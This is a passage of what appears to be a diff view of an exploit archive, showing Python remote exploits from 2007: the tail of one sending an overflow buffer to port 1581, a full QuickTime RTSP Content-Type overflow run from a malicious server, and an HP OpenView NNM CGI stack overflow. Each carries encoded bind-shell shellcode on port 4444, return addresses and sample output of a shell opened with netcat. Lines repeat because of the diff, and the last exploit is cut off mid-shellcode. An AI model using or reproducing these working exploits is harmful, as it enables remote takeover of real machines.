"\x73\x71\x78\x59\x77\x70\x79\x5a\x66\x71\x69\x66\x37\x6b\x4f\x6a"
"\x76\x52\x75\x4b\x4f\x5a\x70\x71\x76\x31\x7a\x55\x34\x31\x76\x72"
"\x48\x50\x63\x72\x4d\x6f\x79\x78\x65\x53\x5a\x72\x70\x72\x79\x76"
"\x49\x78\x4c\x4b\x39\x4d\x37\x53\x5a\x32\x64\x6d\x59\x6a\x42\x37"
"\x41\x6b\x70\x4b\x43\x4f\x5a\x49\x6e\x63\x72\x56\x4d\x49\x6e\x30"
"\x42\x64\x6c\x6d\x43\x6c\x4d\x62\x5a\x75\x68\x6c\x6b\x6e\x4b\x6e"
"\x4b\x50\x68\x43\x42\x49\x6e\x6c\x73\x62\x36\x69\x6f\x74\x35\x30"
"\x44\x6b\x4f\x48\x56\x53\x6b\x70\x57\x73\x62\x71\x41\x70\x51\x76"
"\x31\x63\x5a\x57\x71\x42\x71\x66\x31\x72\x75\x71\x41\x49\x6f\x68"
"\x50\x75\x38\x4c\x6d\x79\x49\x74\x45\x5a\x6e\x32\x73\x4b\x4f\x6e"
"\x36\x72\x4a\x6b\x4f\x6b\x4f\x50\x37\x79\x6f\x4e\x30\x6e\x6b\x46"
"\x37\x69\x6c\x4f\x73\x69\x54\x52\x44\x49\x6f\x4b\x66\x43\x62\x6b"
"\x4f\x5a\x70\x51\x78\x7a\x50\x4f\x7a\x76\x64\x31\x4f\x33\x63\x4b"
"\x4f\x48\x56\x49\x6f\x48\x50\x61")
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
print "[*] Connecting to "+sys.argv[1]
expl.connect ( ( sys.argv[1], 1581 ) )
print "[*] Sending evil buffer, ph33r"
expl.send ( 'GET /BACLIENT HTTP/1.0\r\nHost: 192.168.1.1 '+ buffer+'\r\n\r\n')
expl.close()
print "[*] Check port 4444 for bindshell"
# milw0rm.com [2007-10-27]

250
platforms/windows/remote/4657.py
View file

@ -1,125 +1,125 @@
#!/usr/bin/python
##########################################################################
# http://www.offensive-security.com
# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
# Tested on: Apple QuickTime Player 7.3 / 7.2 IE7,FF /Opera, XP SP2, Vista
# This exploit is completely "Universal" .... It has also been modded to work via url redirection ...
# Magic RETs work on 7.3,7.2,XPSP2,Vista,IE7,Firefox,Opera....
# re-edited by muts and javaguru1999 to annoy Symantec
# http://www.symantec.com/enterprise/security_response/weblog/2007/11/0day_exploit_for_apple_quickti.html
# there IS NO SPOON!
##########################################################################
# "With Internet Explorer versions 6 and 7, and the Safari 3 beta,
# the attack appears to be prevented because standard buffer overflow
# prevention processes act before any damage can be done, Florio wrote.
# With Firefox, the QuickTime RTSP response is unmoderated. As a result,
# the exploit works against Firefox if QuickTime is the default multimedia player,
# according to Florio."
##########################################################################
# Calling Quicktime via URL kicks in an Extra Exception Handler,
# of which we have no control over.
# By making the buffer larger than the original exploit, we can overwrite
# the last exception handler, and regain control over execution.
# This is indeed an evil exploit - muhaha.
##########################################################################
from socket import *
header = (
'RTSP/1.0 200 OK\r\n'
'CSeq: 1\r\n'
'Date: 0x00 :P\r\n'
'Content-Base: rtsp://0.0.0.0/1.mp3/\r\n'
'Content-Type: %s\r\n' # <-- overflow
'Content-Length: %d\r\n'
'\r\n')
body = (
'v=0\r\n'
'o=- 16689332712 1 IN IP4 0.0.0.0\r\n'
's=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n'
'i=1.mp3\r\n'
't=0 0\r\n'
'a=tool:ciamciaramcia\r\n'
'a=type:broadcast\r\n'
'a=control:*\r\n'
'a=range:npt=0-213.077\r\n'
'a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n'
'a=x-qt-text-inf:1.mp3\r\n'
'm=audio 0 RTP/AVP 14\r\n'
'c=IN IP4 0.0.0.0\r\n'
'a=control:track1\r\n'
)
# ExitProcess shellcode will kill browser, but keep the shell open
shellcode =(# win32_bind - EXITFUNC=process LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x37\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42"
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x52\x32\x42\x42\x32\x41"
"\x41\x30\x41\x41\x58\x42\x50\x38\x42\x42\x75\x39\x79\x4b\x4c\x61"
"\x7a\x38\x6b\x50\x4d\x68\x68\x69\x69\x4b\x4f\x4b\x4f\x59\x6f\x53"
"\x50\x4e\x6b\x32\x4c\x44\x64\x35\x74\x6e\x6b\x30\x45\x57\x4c\x4e"
"\x6b\x41\x6c\x64\x45\x51\x68\x46\x61\x4a\x4f\x6c\x4b\x30\x4f\x46"
"\x78\x6c\x4b\x71\x4f\x47\x50\x33\x31\x5a\x4b\x61\x59\x6e\x6b\x50"
"\x34\x4e\x6b\x46\x61\x78\x6e\x50\x31\x69\x50\x4e\x79\x4e\x4c\x4b"
"\x34\x6b\x70\x52\x54\x63\x37\x38\x41\x6a\x6a\x44\x4d\x63\x31\x6b"
"\x72\x68\x6b\x49\x64\x77\x4b\x30\x54\x41\x34\x45\x78\x52\x55\x69"
"\x75\x6e\x6b\x73\x6f\x75\x74\x56\x61\x7a\x4b\x33\x56\x4e\x6b\x36"
"\x6c\x72\x6b\x4c\x4b\x53\x6f\x35\x4c\x77\x71\x38\x6b\x47\x73\x44"
"\x6c\x6e\x6b\x4b\x39\x32\x4c\x35\x74\x77\x6c\x65\x31\x69\x53\x56"
"\x51\x49\x4b\x65\x34\x4e\x6b\x67\x33\x34\x70\x4c\x4b\x77\x30\x74"
"\x4c\x6e\x6b\x64\x30\x47\x6c\x4c\x6d\x6e\x6b\x41\x50\x63\x38\x53"
"\x6e\x70\x68\x4e\x6e\x62\x6e\x56\x6e\x38\x6c\x52\x70\x6b\x4f\x7a"
"\x76\x72\x46\x61\x43\x43\x56\x52\x48\x77\x43\x64\x72\x51\x78\x71"
"\x67\x50\x73\x70\x32\x71\x4f\x31\x44\x4b\x4f\x4a\x70\x75\x38\x78"
"\x4b\x68\x6d\x49\x6c\x75\x6b\x46\x30\x4b\x4f\x79\x46\x53\x6f\x6f"
"\x79\x38\x65\x73\x56\x4c\x41\x58\x6d\x64\x48\x65\x52\x72\x75\x32"
"\x4a\x73\x32\x49\x6f\x4a\x70\x33\x58\x78\x59\x63\x39\x39\x65\x4c"
"\x6d\x72\x77\x6b\x4f\x6e\x36\x50\x53\x52\x73\x51\x43\x70\x53\x33"
"\x63\x71\x53\x63\x63\x61\x53\x33\x63\x4b\x4f\x5a\x70\x73\x56\x51"
"\x78\x37\x61\x41\x4c\x50\x66\x53\x63\x6c\x49\x5a\x41\x5a\x35\x51"
"\x78\x4d\x74\x67\x6a\x30\x70\x4b\x77\x66\x37\x79\x6f\x4b\x66\x41"
"\x7a\x32\x30\x72\x71\x33\x65\x59\x6f\x38\x50\x70\x68\x6f\x54\x6e"
"\x4d\x64\x6e\x38\x69\x32\x77\x4b\x4f\x4e\x36\x51\x43\x41\x45\x39"
"\x6f\x4a\x70\x71\x78\x4a\x45\x71\x59\x6d\x56\x43\x79\x76\x37\x4b"
"\x4f\x39\x46\x52\x70\x72\x74\x46\x34\x31\x45\x4b\x4f\x68\x50\x4e"
"\x73\x43\x58\x6b\x57\x71\x69\x6f\x36\x53\x49\x76\x37\x6b\x4f\x38"
"\x56\x71\x45\x6b\x4f\x48\x50\x35\x36\x70\x6a\x31\x74\x45\x36\x31"
"\x78\x62\x43\x32\x4d\x6f\x79\x7a\x45\x71\x7a\x30\x50\x33\x69\x46"
"\x49\x6a\x6c\x6b\x39\x6a\x47\x73\x5a\x51\x54\x6f\x79\x6d\x32\x30"
"\x31\x59\x50\x38\x73\x4d\x7a\x59\x6e\x43\x72\x36\x4d\x69\x6e\x73"
"\x72\x54\x6c\x6f\x63\x4c\x4d\x72\x5a\x74\x78\x4c\x6b\x6c\x6b\x6e"
"\x4b\x35\x38\x50\x72\x6b\x4e\x4c\x73\x64\x56\x4b\x4f\x43\x45\x32"
"\x64\x79\x6f\x7a\x76\x33\x6b\x32\x77\x62\x72\x63\x61\x33\x61\x30"
"\x51\x30\x6a\x53\x31\x71\x41\x46\x31\x52\x75\x32\x71\x6b\x4f\x4e"
"\x30\x70\x68\x4e\x4d\x7a\x79\x46\x65\x4a\x6e\x72\x73\x69\x6f\x58"
"\x56\x72\x4a\x69\x6f\x69\x6f\x66\x57\x39\x6f\x58\x50\x4c\x4b\x41"
"\x47\x6b\x4c\x6c\x43\x4f\x34\x32\x44\x4b\x4f\x68\x56\x76\x32\x4b"
"\x4f\x4e\x30\x71\x78\x33\x4e\x6a\x78\x49\x72\x43\x43\x61\x43\x4b"
"\x4f\x48\x56\x69\x6f\x6a\x70\x42")
tmp = "A" * 987
tmp +="\xeb\x20\x90\x90" # short jump for 7.2
tmp +="\xeb\x20\x9c\x66" # 669c20eb | funky magic - pop pop ret for 7.2 / short jump for 7.3
tmp +="\x4e\x28\x86\x66" # 6686284e | pop pop ret for 7.3
tmp += "\x90" * 92
tmp += shellcode
tmp += "\x41" * int(30000-len(shellcode)) # play with this buffer if you still get exceptions.
header %= (tmp, len(body))
evil = header + body
s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 554))
s.listen(1)
print "[+] Listening on [RTSP] 554"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
c.recv(1024)
c.send(evil)
raw_input("[+] Done, press enter to quit")
c.close()
s.close()
# milw0rm.com [2007-11-26]
#!/usr/bin/python
##########################################################################
# http://www.offensive-security.com
# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
# Tested on: Apple QuickTime Player 7.3 / 7.2 IE7,FF /Opera, XP SP2, Vista
# This exploit is completely "Universal" .... It has also been modded to work via url redirection ...
# Magic RETs work on 7.3,7.2,XPSP2,Vista,IE7,Firefox,Opera....
# re-edited by muts and javaguru1999 to annoy Symantec
# http://www.symantec.com/enterprise/security_response/weblog/2007/11/0day_exploit_for_apple_quickti.html
# there IS NO SPOON!
##########################################################################
# "With Internet Explorer versions 6 and 7, and the Safari 3 beta,
# the attack appears to be prevented because standard buffer overflow
# prevention processes act before any damage can be done, Florio wrote.
# With Firefox, the QuickTime RTSP response is unmoderated. As a result,
# the exploit works against Firefox if QuickTime is the default multimedia player,
# according to Florio."
##########################################################################
# Calling Quicktime via URL kicks in an Extra Exception Handler,
# of which we have no control over.
# By making the buffer larger than the original exploit, we can overwrite
# the last exception handler, and regain control over execution.
# This is indeed an evil exploit - muhaha.
##########################################################################
from socket import *
header = (
'RTSP/1.0 200 OK\r\n'
'CSeq: 1\r\n'
'Date: 0x00 :P\r\n'
'Content-Base: rtsp://0.0.0.0/1.mp3/\r\n'
'Content-Type: %s\r\n' # <-- overflow
'Content-Length: %d\r\n'
'\r\n')
body = (
'v=0\r\n'
'o=- 16689332712 1 IN IP4 0.0.0.0\r\n'
's=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n'
'i=1.mp3\r\n'
't=0 0\r\n'
'a=tool:ciamciaramcia\r\n'
'a=type:broadcast\r\n'
'a=control:*\r\n'
'a=range:npt=0-213.077\r\n'
'a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n'
'a=x-qt-text-inf:1.mp3\r\n'
'm=audio 0 RTP/AVP 14\r\n'
'c=IN IP4 0.0.0.0\r\n'
'a=control:track1\r\n'
)
# ExitProcess shellcode will kill browser, but keep the shell open
shellcode =(# win32_bind - EXITFUNC=process LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x37\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42"
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x52\x32\x42\x42\x32\x41"
"\x41\x30\x41\x41\x58\x42\x50\x38\x42\x42\x75\x39\x79\x4b\x4c\x61"
"\x7a\x38\x6b\x50\x4d\x68\x68\x69\x69\x4b\x4f\x4b\x4f\x59\x6f\x53"
"\x50\x4e\x6b\x32\x4c\x44\x64\x35\x74\x6e\x6b\x30\x45\x57\x4c\x4e"
"\x6b\x41\x6c\x64\x45\x51\x68\x46\x61\x4a\x4f\x6c\x4b\x30\x4f\x46"
"\x78\x6c\x4b\x71\x4f\x47\x50\x33\x31\x5a\x4b\x61\x59\x6e\x6b\x50"
"\x34\x4e\x6b\x46\x61\x78\x6e\x50\x31\x69\x50\x4e\x79\x4e\x4c\x4b"
"\x34\x6b\x70\x52\x54\x63\x37\x38\x41\x6a\x6a\x44\x4d\x63\x31\x6b"
"\x72\x68\x6b\x49\x64\x77\x4b\x30\x54\x41\x34\x45\x78\x52\x55\x69"
"\x75\x6e\x6b\x73\x6f\x75\x74\x56\x61\x7a\x4b\x33\x56\x4e\x6b\x36"
"\x6c\x72\x6b\x4c\x4b\x53\x6f\x35\x4c\x77\x71\x38\x6b\x47\x73\x44"
"\x6c\x6e\x6b\x4b\x39\x32\x4c\x35\x74\x77\x6c\x65\x31\x69\x53\x56"
"\x51\x49\x4b\x65\x34\x4e\x6b\x67\x33\x34\x70\x4c\x4b\x77\x30\x74"
"\x4c\x6e\x6b\x64\x30\x47\x6c\x4c\x6d\x6e\x6b\x41\x50\x63\x38\x53"
"\x6e\x70\x68\x4e\x6e\x62\x6e\x56\x6e\x38\x6c\x52\x70\x6b\x4f\x7a"
"\x76\x72\x46\x61\x43\x43\x56\x52\x48\x77\x43\x64\x72\x51\x78\x71"
"\x67\x50\x73\x70\x32\x71\x4f\x31\x44\x4b\x4f\x4a\x70\x75\x38\x78"
"\x4b\x68\x6d\x49\x6c\x75\x6b\x46\x30\x4b\x4f\x79\x46\x53\x6f\x6f"
"\x79\x38\x65\x73\x56\x4c\x41\x58\x6d\x64\x48\x65\x52\x72\x75\x32"
"\x4a\x73\x32\x49\x6f\x4a\x70\x33\x58\x78\x59\x63\x39\x39\x65\x4c"
"\x6d\x72\x77\x6b\x4f\x6e\x36\x50\x53\x52\x73\x51\x43\x70\x53\x33"
"\x63\x71\x53\x63\x63\x61\x53\x33\x63\x4b\x4f\x5a\x70\x73\x56\x51"
"\x78\x37\x61\x41\x4c\x50\x66\x53\x63\x6c\x49\x5a\x41\x5a\x35\x51"
"\x78\x4d\x74\x67\x6a\x30\x70\x4b\x77\x66\x37\x79\x6f\x4b\x66\x41"
"\x7a\x32\x30\x72\x71\x33\x65\x59\x6f\x38\x50\x70\x68\x6f\x54\x6e"
"\x4d\x64\x6e\x38\x69\x32\x77\x4b\x4f\x4e\x36\x51\x43\x41\x45\x39"
"\x6f\x4a\x70\x71\x78\x4a\x45\x71\x59\x6d\x56\x43\x79\x76\x37\x4b"
"\x4f\x39\x46\x52\x70\x72\x74\x46\x34\x31\x45\x4b\x4f\x68\x50\x4e"
"\x73\x43\x58\x6b\x57\x71\x69\x6f\x36\x53\x49\x76\x37\x6b\x4f\x38"
"\x56\x71\x45\x6b\x4f\x48\x50\x35\x36\x70\x6a\x31\x74\x45\x36\x31"
"\x78\x62\x43\x32\x4d\x6f\x79\x7a\x45\x71\x7a\x30\x50\x33\x69\x46"
"\x49\x6a\x6c\x6b\x39\x6a\x47\x73\x5a\x51\x54\x6f\x79\x6d\x32\x30"
"\x31\x59\x50\x38\x73\x4d\x7a\x59\x6e\x43\x72\x36\x4d\x69\x6e\x73"
"\x72\x54\x6c\x6f\x63\x4c\x4d\x72\x5a\x74\x78\x4c\x6b\x6c\x6b\x6e"
"\x4b\x35\x38\x50\x72\x6b\x4e\x4c\x73\x64\x56\x4b\x4f\x43\x45\x32"
"\x64\x79\x6f\x7a\x76\x33\x6b\x32\x77\x62\x72\x63\x61\x33\x61\x30"
"\x51\x30\x6a\x53\x31\x71\x41\x46\x31\x52\x75\x32\x71\x6b\x4f\x4e"
"\x30\x70\x68\x4e\x4d\x7a\x79\x46\x65\x4a\x6e\x72\x73\x69\x6f\x58"
"\x56\x72\x4a\x69\x6f\x69\x6f\x66\x57\x39\x6f\x58\x50\x4c\x4b\x41"
"\x47\x6b\x4c\x6c\x43\x4f\x34\x32\x44\x4b\x4f\x68\x56\x76\x32\x4b"
"\x4f\x4e\x30\x71\x78\x33\x4e\x6a\x78\x49\x72\x43\x43\x61\x43\x4b"
"\x4f\x48\x56\x69\x6f\x6a\x70\x42")
tmp = "A" * 987
tmp +="\xeb\x20\x90\x90" # short jump for 7.2
tmp +="\xeb\x20\x9c\x66" # 669c20eb | funky magic - pop pop ret for 7.2 / short jump for 7.3
tmp +="\x4e\x28\x86\x66" # 6686284e | pop pop ret for 7.3
tmp += "\x90" * 92
tmp += shellcode
tmp += "\x41" * int(30000-len(shellcode)) # play with this buffer if you still get exceptions.
header %= (tmp, len(body))
evil = header + body
s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 554))
s.listen(1)
print "[+] Listening on [RTSP] 554"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
c.recv(1024)
c.send(evil)
raw_input("[+] Done, press enter to quit")
c.close()
s.close()
# milw0rm.com [2007-11-26]

178
platforms/windows/remote/4724.py
View file

@ -1,89 +1,89 @@
#!/usr/bin/python
# HP OpenView Network Node Manager CGI Buffer Overflow
# Tested on NNM Release B.07.50 / Windows 2000 server SP4
# http://www.zerodayinitiative.com/advisories/ZDI-07-071.html
# Coded by Mati Aharoni
# muts|offensive-security|com
# http://www.offensive-security.com/0day/hpnnm.txt
# Notes:
# Vanilla stack based overflow
# I had no idea how to debug this...I ended up modifying the Openview5.exe binary by hijacking
# the entry point and injecting Sleep just before exe execution. This gave me enough
# time to attach a debugger before program termination. If anyone knows how to properly
# debug this, please tell me about it - there *must* be a better way...
#
# bt tools # ./sploit 192.168.1.105
# [+] Connecting to 192.168.1.105
# [+] Sending Evil Buffer to NNM CGI
# [+] Payload Sent, ph33r.
#
# bt tools # nc -nv 192.168.1.105 4444
# (UNKNOWN) [192.168.1.105] 4444 (krb524) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\Program Files\HP OpenView\www\cgi-bin>
import socket
import os
import sys
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
print "[+] Connecting to "+sys.argv[1]
expl.connect ( ( sys.argv[1], 80 ) )
print "[+] Sending Evil Buffer to NNM CGI\n"
buffer="GET /OvCgi/OpenView5.exe?Context=Snmp&Action="
buffer+="A"*5123
buffer+="\x29\x4c\xe1\x77" # JMP ESP user32.dll Win2kSP4
buffer+="\x90"*32
# EXITFUNC=thread LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
buffer+=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x48\x5a\x6a\x68"
"\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x78\x32\x41\x42\x32\x42"
"\x41\x30\x42\x41\x41\x58\x38\x41\x42\x50\x75\x6b\x59\x39\x6c\x50"
"\x6a\x78\x6b\x30\x4d\x49\x78\x38\x79\x59\x6f\x4b\x4f\x39\x6f\x71"
"\x70\x6e\x6b\x50\x6c\x67\x54\x67\x54\x4c\x4b\x72\x65\x65\x6c\x4c"
"\x4b\x41\x6c\x36\x65\x42\x58\x46\x61\x4a\x4f\x6c\x4b\x70\x4f\x64"
"\x58\x4c\x4b\x73\x6f\x47\x50\x76\x61\x7a\x4b\x50\x49\x6c\x4b\x55"
"\x64\x4e\x6b\x54\x41\x7a\x4e\x65\x61\x6f\x30\x6d\x49\x6c\x6c\x4e"
"\x64\x4f\x30\x71\x64\x35\x57\x49\x51\x4a\x6a\x56\x6d\x63\x31\x5a"
"\x62\x5a\x4b\x79\x64\x77\x4b\x61\x44\x57\x54\x45\x78\x63\x45\x78"
"\x65\x6c\x4b\x33\x6f\x44\x64\x53\x31\x48\x6b\x41\x76\x4c\x4b\x54"
"\x4c\x30\x4b\x6e\x6b\x43\x6f\x45\x4c\x66\x61\x78\x6b\x66\x63\x76"
"\x4c\x4c\x4b\x6c\x49\x42\x4c\x71\x34\x65\x4c\x50\x61\x48\x43\x50"
"\x31\x6b\x6b\x30\x64\x4c\x4b\x50\x43\x70\x30\x4e\x6b\x31\x50\x64"
"\x4c\x6c\x4b\x74\x30\x47\x6c\x6e\x4d\x6e\x6b\x63\x70\x75\x58\x63"
"\x6e\x62\x48\x4c\x4e\x50\x4e\x74\x4e\x5a\x4c\x50\x50\x4b\x4f\x4b"
"\x66\x30\x66\x30\x53\x33\x56\x73\x58\x66\x53\x30\x32\x75\x38\x70"
"\x77\x53\x43\x54\x72\x33\x6f\x76\x34\x6b\x4f\x6e\x30\x62\x48\x6a"
"\x6b\x38\x6d\x49\x6c\x67\x4b\x50\x50\x4b\x4f\x48\x56\x61\x4f\x6c"
"\x49\x38\x65\x65\x36\x4b\x31\x4a\x4d\x47\x78\x43\x32\x32\x75\x73"
"\x5a\x64\x42\x79\x6f\x38\x50\x75\x38\x7a\x79\x46\x69\x7a\x55\x6c"
"\x6d\x66\x37\x59\x6f\x6e\x36\x76\x33\x30\x53\x30\x53\x50\x53\x51"
"\x43\x42\x63\x70\x53\x51\x53\x53\x63\x4b\x4f\x4e\x30\x33\x56\x62"
"\x48\x54\x51\x53\x6c\x61\x76\x52\x73\x4e\x69\x5a\x41\x6e\x75\x75"
"\x38\x4d\x74\x66\x7a\x34\x30\x6a\x67\x32\x77\x6b\x4f\x79\x46\x51"
"\x7a\x46\x70\x51\x41\x70\x55\x4b\x4f\x38\x50\x53\x58\x4e\x44\x4c"
"\x6d\x66\x4e\x78\x69\x33\x67\x49\x6f\x6e\x36\x50\x53\x31\x45\x6b"
"\x4f\x5a\x70\x75\x38\x4d\x35\x42\x69\x6b\x36\x30\x49\x71\x47\x79"
"\x6f\x59\x46\x56\x30\x50\x54\x70\x54\x30\x55\x79\x6f\x48\x50\x4f"
"\x63\x52\x48\x7a\x47\x70\x79\x59\x56\x54\x39\x51\x47\x59\x6f\x58"
"\x56\x50\x55\x79\x6f\x58\x50\x52\x46\x73\x5a\x61\x74\x63\x56\x33"
"\x58\x65\x33\x52\x4d\x4d\x59\x4b\x55\x33\x5a\x70\x50\x56\x39\x44"
"\x69\x6a\x6c\x4d\x59\x59\x77\x71\x7a\x67\x34\x4c\x49\x7a\x42\x54"
"\x71\x4b\x70\x79\x63\x4c\x6a\x4b\x4e\x52\x62\x64\x6d\x49\x6e\x30"
"\x42\x56\x4c\x4d\x43\x4c\x4d\x72\x5a\x77\x48\x6c\x6b\x4c\x6b\x6c"
"\x6b\x32\x48\x31\x62\x49\x6e\x6f\x43\x77\x66\x6b\x4f\x50\x75\x51"
"\x54\x6b\x4f\x7a\x76\x61\x4b\x72\x77\x66\x32\x70\x51\x36\x31\x33"
"\x61\x53\x5a\x65\x51\x72\x71\x61\x41\x30\x55\x41\x41\x79\x6f\x48"
"\x50\x32\x48\x6c\x6d\x6e\x39\x45\x55\x58\x4e\x61\x43\x69\x6f\x6a"
"\x76\x53\x5a\x39\x6f\x4b\x4f\x46\x57\x69\x6f\x6a\x70\x4e\x6b\x73"
"\x67\x49\x6c\x6d\x53\x49\x54\x70\x64\x6b\x4f\x4b\x66\x61\x42\x6b"
"\x4f\x48\x50\x33\x58\x4a\x4f\x58\x4e\x6d\x30\x35\x30\x33\x63\x4b"
"\x4f\x6b\x66\x79\x6f\x58\x50\x68")
buffer+="\r\n\r\n"
expl.send (buffer)
expl.close()
print "[+] Payload Sent, ph33r."
# milw0rm.com [2007-12-12]
#!/usr/bin/python
# HP OpenView Network Node Manager CGI Buffer Overflow
# Tested on NNM Release B.07.50 / Windows 2000 server SP4
# http://www.zerodayinitiative.com/advisories/ZDI-07-071.html
# Coded by Mati Aharoni
# muts|offensive-security|com
# http://www.offensive-security.com/0day/hpnnm.txt
# Notes:
# Vanilla stack based overflow
# I had no idea how to debug this...I ended up modifying the Openview5.exe binary by hijacking
# the entry point and injecting Sleep just before exe execution. This gave me enough
# time to attach a debugger before program termination. If anyone knows how to properly
# debug this, please tell me about it - there *must* be a better way...
#
# bt tools # ./sploit 192.168.1.105
# [+] Connecting to 192.168.1.105
# [+] Sending Evil Buffer to NNM CGI
# [+] Payload Sent, ph33r.
#
# bt tools # nc -nv 192.168.1.105 4444
# (UNKNOWN) [192.168.1.105] 4444 (krb524) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\Program Files\HP OpenView\www\cgi-bin>
import socket
import os
import sys
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
print "[+] Connecting to "+sys.argv[1]
expl.connect ( ( sys.argv[1], 80 ) )
print "[+] Sending Evil Buffer to NNM CGI\n"
buffer="GET /OvCgi/OpenView5.exe?Context=Snmp&Action="
buffer+="A"*5123
buffer+="\x29\x4c\xe1\x77" # JMP ESP user32.dll Win2kSP4
buffer+="\x90"*32
# EXITFUNC=thread LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
buffer+=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x48\x5a\x6a\x68"
"\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x78\x32\x41\x42\x32\x42"
"\x41\x30\x42\x41\x41\x58\x38\x41\x42\x50\x75\x6b\x59\x39\x6c\x50"
"\x6a\x78\x6b\x30\x4d\x49\x78\x38\x79\x59\x6f\x4b\x4f\x39\x6f\x71"
"\x70\x6e\x6b\x50\x6c\x67\x54\x67\x54\x4c\x4b\x72\x65\x65\x6c\x4c"
"\x4b\x41\x6c\x36\x65\x42\x58\x46\x61\x4a\x4f\x6c\x4b\x70\x4f\x64"
"\x58\x4c\x4b\x73\x6f\x47\x50\x76\x61\x7a\x4b\x50\x49\x6c\x4b\x55"
"\x64\x4e\x6b\x54\x41\x7a\x4e\x65\x61\x6f\x30\x6d\x49\x6c\x6c\x4e"
"\x64\x4f\x30\x71\x64\x35\x57\x49\x51\x4a\x6a\x56\x6d\x63\x31\x5a"
"\x62\x5a\x4b\x79\x64\x77\x4b\x61\x44\x57\x54\x45\x78\x63\x45\x78"
"\x65\x6c\x4b\x33\x6f\x44\x64\x53\x31\x48\x6b\x41\x76\x4c\x4b\x54"
"\x4c\x30\x4b\x6e\x6b\x43\x6f\x45\x4c\x66\x61\x78\x6b\x66\x63\x76"
"\x4c\x4c\x4b\x6c\x49\x42\x4c\x71\x34\x65\x4c\x50\x61\x48\x43\x50"
"\x31\x6b\x6b\x30\x64\x4c\x4b\x50\x43\x70\x30\x4e\x6b\x31\x50\x64"
"\x4c\x6c\x4b\x74\x30\x47\x6c\x6e\x4d\x6e\x6b\x63\x70\x75\x58\x63"
"\x6e\x62\x48\x4c\x4e\x50\x4e\x74\x4e\x5a\x4c\x50\x50\x4b\x4f\x4b"
"\x66\x30\x66\x30\x53\x33\x56\x73\x58\x66\x53\x30\x32\x75\x38\x70"
"\x77\x53\x43\x54\x72\x33\x6f\x76\x34\x6b\x4f\x6e\x30\x62\x48\x6a"
"\x6b\x38\x6d\x49\x6c\x67\x4b\x50\x50\x4b\x4f\x48\x56\x61\x4f\x6c"
"\x49\x38\x65\x65\x36\x4b\x31\x4a\x4d\x47\x78\x43\x32\x32\x75\x73"
"\x5a\x64\x42\x79\x6f\x38\x50\x75\x38\x7a\x79\x46\x69\x7a\x55\x6c"
"\x6d\x66\x37\x59\x6f\x6e\x36\x76\x33\x30\x53\x30\x53\x50\x53\x51"
"\x43\x42\x63\x70\x53\x51\x53\x53\x63\x4b\x4f\x4e\x30\x33\x56\x62"
"\x48\x54\x51\x53\x6c\x61\x76\x52\x73\x4e\x69\x5a\x41\x6e\x75\x75"
"\x38\x4d\x74\x66\x7a\x34\x30\x6a\x67\x32\x77\x6b\x4f\x79\x46\x51"
"\x7a\x46\x70\x51\x41\x70\x55\x4b\x4f\x38\x50\x53\x58\x4e\x44\x4c"
"\x6d\x66\x4e\x78\x69\x33\x67\x49\x6f\x6e\x36\x50\x53\x31\x45\x6b"
"\x4f\x5a\x70\x75\x38\x4d\x35\x42\x69\x6b\x36\x30\x49\x71\x47\x79"
"\x6f\x59\x46\x56\x30\x50\x54\x70\x54\x30\x55\x79\x6f\x48\x50\x4f"
"\x63\x52\x48\x7a\x47\x70\x79\x59\x56\x54\x39\x51\x47\x59\x6f\x58"
"\x56\x50\x55\x79\x6f\x58\x50\x52\x46\x73\x5a\x61\x74\x63\x56\x33"
"\x58\x65\x33\x52\x4d\x4d\x59\x4b\x55\x33\x5a\x70\x50\x56\x39\x44"
"\x69\x6a\x6c\x4d\x59\x59\x77\x71\x7a\x67\x34\x4c\x49\x7a\x42\x54"
"\x71\x4b\x70\x79\x63\x4c\x6a\x4b\x4e\x52\x62\x64\x6d\x49\x6e\x30"
"\x42\x56\x4c\x4d\x43\x4c\x4d\x72\x5a\x77\x48\x6c\x6b\x4c\x6b\x6c"
"\x6b\x32\x48\x31\x62\x49\x6e\x6f\x43\x77\x66\x6b\x4f\x50\x75\x51"
"\x54\x6b\x4f\x7a\x76\x61\x4b\x72\x77\x66\x32\x70\x51\x36\x31\x33"
"\x61\x53\x5a\x65\x51\x72\x71\x61\x41\x30\x55\x41\x41\x79\x6f\x48"
